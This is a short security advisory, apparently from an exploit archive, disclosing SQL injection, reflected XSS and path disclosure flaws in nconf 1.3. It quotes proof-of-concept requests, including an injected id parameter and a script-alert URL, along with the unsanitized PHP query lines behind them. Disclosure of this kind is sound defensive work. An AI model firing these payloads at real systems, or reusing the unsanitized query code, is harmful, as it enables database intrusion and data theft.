Nconf 1.3 SQL Injection / Cross Site Scripting

`# Exploit Title: nconf handle_item.php，Modify_attr.php etc Multiple Sql injection  
# Date: 2013/3/4  
# Exploit Author: Saadat Ullah，[email protected]  
# Software Link: http://sourceforge.net/projects/nconf/files/nconf/  
# Vendors: http://www.nconf.org/  
# Author HomePage: http://security-geeks.blogspot.com/  
# Version: nconf 1.3  
# Tested on: Server: Apache/2.2.15 (Centos) PHP/5.3.3  
  
Nconf Is vulnerable to Sql injection in most of the files , they did'nt sanitize any GET POST FILEDs.  
Some OF them Are  
  
Blind Sqli In handle_item.php on Id parameter  
handle_item.php?id=1'  
P0c  
$query2 .= ' AND id_item <> '.$_GET["id"];  
  
  
delete_attr.php  
POST DATA : id=15'&name=&delete=yes&submit=Delete  
Poc  
Id Via GEt FIELD  
$query = 'SELECT attr_name, config_class FROM ConfigAttrs, ConfigClasses WHERE id_attr='.$_GET["id"].' AND fk_id_class=ConfigClasses.id_class';  
And id via Post Field  
$query = 'DELETE FROM ConfigAttrs  
WHERE id_attr='.$_POST["id"];  
  
clone_host_write2db.php  
Again On id paramerter.  
Their are Many more...  
  
A Simple Reflected XSS   
http://localhost/nconf/handle_item.php?item=<script>alert('Hi');</script>  
Poc  
$item_class = $_GET["item"];  
.  
.  
echo without Sanitization  
echo '<h2>'.ucfirst($handle_action).' '.$item_class.'</h2>';  
  
A LocalPath Disclose  
http://localhost/nconf/call_file.php?ajax_file=service_list.php&debug=yes  
Post Data:  
host_id=5372&highlight_service=5373&class=a  
  
  
#Independent Pakistani Security Researcher  
  
  
  
  
`